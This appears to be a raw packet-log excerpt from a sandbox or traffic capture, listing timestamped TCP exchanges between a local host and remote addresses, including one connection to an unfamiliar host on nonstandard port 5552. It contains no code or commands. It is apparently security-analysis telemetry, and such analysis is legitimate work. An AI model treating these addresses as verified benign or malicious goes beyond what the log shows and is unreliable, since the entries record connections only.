Dec 30, 2024 11:36:39.796681881 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796694040 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796849012 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.796879053 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.797012091 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.797027111 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.797188997 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.797204971 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.800348043 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.800415993 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.800638914 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.800646067 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:39.800873041 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801353931 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801428080 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801465988 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801542997 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801659107 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801906109 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:39.801965952 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.032910109 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.032938004 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033138990 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033168077 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033396959 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033412933 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033565998 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033586979 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033822060 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.033849955 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.034079075 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.036633968 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.036652088 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.038742065 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.038752079 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.039493084 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.039499998 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.041800976 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.041807890 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.041850090 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.041855097 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.041883945 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.041914940 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.041919947 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.041956902 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.042038918 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.042042017 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.042083979 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.043965101 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044024944 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044087887 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044128895 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044183969 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044239998 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.044296026 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.055136919 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.055267096 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.055289984 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.055733919 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.055748940 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056155920 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056191921 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056458950 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056479931 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056869984 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.056883097 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.057240009 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.057251930 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.057647943 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.070904970 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.070921898 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.086502075 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.102163076 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.102170944 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.112198114 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.112238884 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.117650986 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.134339094 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.141640902 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141679049 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141690016 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141700983 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141711950 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141729116 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141736031 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141751051 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141870975 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141880035 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141899109 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.141916037 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.142276049 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.142349005 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:40.154495955 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.174644947 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.194792986 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.198436975 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204183102 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204241991 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204284906 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204372883 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204688072 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204711914 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204746962 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.204818964 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.207675934 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.207755089 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.305448055 CET	49765	443	192.168.2.10	185.199.111.133
Dec 30, 2024 11:36:40.305460930 CET	443	49765	185.199.111.133	192.168.2.10
Dec 30, 2024 11:36:43.040987968 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.041022062 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.041091919 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.041280031 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.041289091 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.652906895 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.653177977 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.653192043 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.654531002 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.659337044 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.664793015 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.670600891 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.670743942 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.793700933 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:43.793749094 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:43.948501110 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:45.592468977 CET	49677	443	192.168.2.10	20.42.65.85
Dec 30, 2024 11:36:53.558098078 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:53.558166981 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:36:53.558458090 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:55.262952089 CET	49802	443	192.168.2.10	142.250.186.164
Dec 30, 2024 11:36:55.262983084 CET	443	49802	142.250.186.164	192.168.2.10
Dec 30, 2024 11:37:19.572307110 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.572376966 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:19.572473049 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.576423883 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.576478958 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:19.576982975 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.590152979 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.590184927 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:19.590367079 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:19.590389013 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.201227903 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.201370955 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.202018976 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.202080965 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.203394890 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.203469038 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.205245018 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.205363989 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.414109945 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.414133072 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.414218903 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.414242983 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.414531946 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.414566040 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.414585114 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.414628029 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.418517113 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.419796944 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.432112932 CET	49995	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:37:20.436935902 CET	80	49995	69.42.215.252	192.168.2.10
Dec 30, 2024 11:37:20.437119961 CET	49995	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:37:20.442217112 CET	49995	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:37:20.447000027 CET	80	49995	69.42.215.252	192.168.2.10
Dec 30, 2024 11:37:20.463336945 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.467325926 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.703680992 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.703804016 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.703845978 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.703902960 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.704539061 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.704612970 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.704714060 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.704730034 CET	443	49991	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.704751015 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.704812050 CET	49991	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.705667973 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.705780983 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.705934048 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.706976891 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.707056999 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.707072973 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.707140923 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.707371950 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.707416058 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.707457066 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.707623959 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.707653046 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.710431099 CET	49992	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.710450888 CET	443	49992	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.710908890 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.710954905 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.711016893 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.711415052 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:20.711427927 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:20.719525099 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.719552040 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:20.719608068 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.719966888 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.719991922 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:20.720041990 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.720804930 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.720813990 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:20.720959902 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:20.720974922 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.026005030 CET	80	49995	69.42.215.252	192.168.2.10
Dec 30, 2024 11:37:21.026098013 CET	49995	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:37:21.315226078 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.316266060 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.316674948 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.316687107 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.317224979 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.317410946 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.318802118 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.318808079 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.337754965 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.337795973 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.340074062 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.340084076 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.351074934 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.351176977 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.353208065 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.353291988 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.356055975 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.356087923 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.356580019 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.356638908 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.356976032 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.377302885 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.377326965 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.377674103 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.377732992 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.378076077 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.403332949 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.423341990 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.516998053 CET	50001	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:21.521872044 CET	5552	50001	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:21.521955013 CET	50001	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:21.522409916 CET	50001	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:21.527231932 CET	5552	50001	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:21.686585903 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.686949968 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.686963081 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.687011003 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.687392950 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.687444925 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.687490940 CET	443	49997	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.687541008 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.687552929 CET	49997	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.688031912 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.688075066 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.688256979 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.688493013 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.688502073 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.689152002 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.689230919 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689282894 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689322948 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.689450979 CET	443	49996	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.689670086 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689671993 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689671993 CET	49996	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689702034 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.689897060 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.689995050 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:21.690006971 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:21.782362938 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.782429934 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.782501936 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.782529116 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.782545090 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.782598972 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.790380001 CET	49998	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.790395021 CET	443	49998	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.791239977 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.791281939 CET	443	50004	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.791342020 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.792464972 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.792481899 CET	443	50004	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.802833080 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.802881002 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.802900076 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.802920103 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.802934885 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.802982092 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.802988052 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.803034067 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.803036928 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.803092957 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.804496050 CET	49999	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.804508924 CET	443	49999	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.805632114 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.805654049 CET	443	50006	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:21.805708885 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.805891037 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:21.805906057 CET	443	50006	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.296617985 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.296694994 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.297410965 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.297465086 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.301132917 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.301202059 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.301901102 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.303133965 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.325661898 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.325684071 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.326054096 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.326183081 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.326483011 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.332427979 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.332448006 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.332757950 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.332839012 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.333729029 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.367337942 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.375324965 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.395330906 CET	443	50004	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.396168947 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.424246073 CET	443	50006	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.424477100 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.453741074 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.453767061 CET	443	50004	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.453933001 CET	50004	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.453939915 CET	443	50004	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.458564043 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.458594084 CET	443	50006	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.458699942 CET	50006	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:22.458707094 CET	443	50006	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:22.674797058 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.675494909 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.675750971 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.676490068 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.677719116 CET	443	50003	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.677798986 CET	50003	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.804647923 CET	50002	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.804677963 CET	443	50002	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.805416107 CET	50007	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.805461884 CET	443	50007	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:22.805525064 CET	50007	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.819624901 CET	50007	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:22.819641113 CET	443	50007	216.58.206.46	192.168.2.10
